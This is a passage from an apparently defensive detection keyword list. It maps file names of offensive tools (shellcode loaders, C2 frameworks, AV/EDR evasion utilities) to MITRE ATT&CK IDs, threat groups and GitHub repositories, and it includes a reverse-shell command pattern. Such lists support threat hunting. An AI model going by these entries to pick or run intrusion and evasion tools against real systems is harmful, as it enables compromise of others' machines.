Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Shellcode_encryption.exe*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*shellcode_exec.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*shellcode_generator.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*shellcode_generator_help.html*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*shellcode_inject.csproj*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*shellcode_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ShellCode_Loader.py*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*shellcode1 += b*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*shellcode20.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*shellcode30.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*shellcode35.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*shellcode40.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 
- T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*Shellcode-Download_CreateThread_Execution*,offensive_tool_keyword,Shellcode-Downloader-CreateThread-Execution,This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution,1,1,N/A,N/A,3,229,49,2023-05-25T02:48:55Z,2022-03-27T07:51:08Z -*Shellcode-Downloader-CreateThread-Execution*,offensive_tool_keyword,Shellcode-Downloader-CreateThread-Execution,This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense 
Evasion,https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution,1,1,N/A,N/A,3,229,49,2023-05-25T02:48:55Z,2022-03-27T07:51:08Z -*shellcodeEncryptDecrypt*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*shellcode-exec.ps1*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,,N/A,,, -*shellcodeexec.x32*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*shellcodeexec.x64*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z 
-*ShellcodeFluctuation.*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*ShellcodeFluctuation64*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*ShellcodeFluctuation86*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*Shellcode-Hide-main*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*Shellcode-Loader-master*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,1,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*ShellcodeRDI.*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective 
DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*ShellcodeRDI.py*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*ShellcodeRDI.py*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shellcode-runner.py*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,,N/A,,, -*ShellcodeTemplate.x64.bin*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*shellcodetester *,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,0,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*ShellCodeTester.csproj*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation 
tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellcodetester.exe*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellcodetester.git*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellcodetester.sh*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*ShellCodeTester.sln*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellerator --reverse-shell --lhost * --lport * --type *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ShellGhost.dll,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost.exe*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost.sln*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost.vcxproj*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost_mapping.py*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost-master.zip*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*shellter.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation 
tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*shepardsbind_recv.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*shepbind_serv.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Sherlock.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 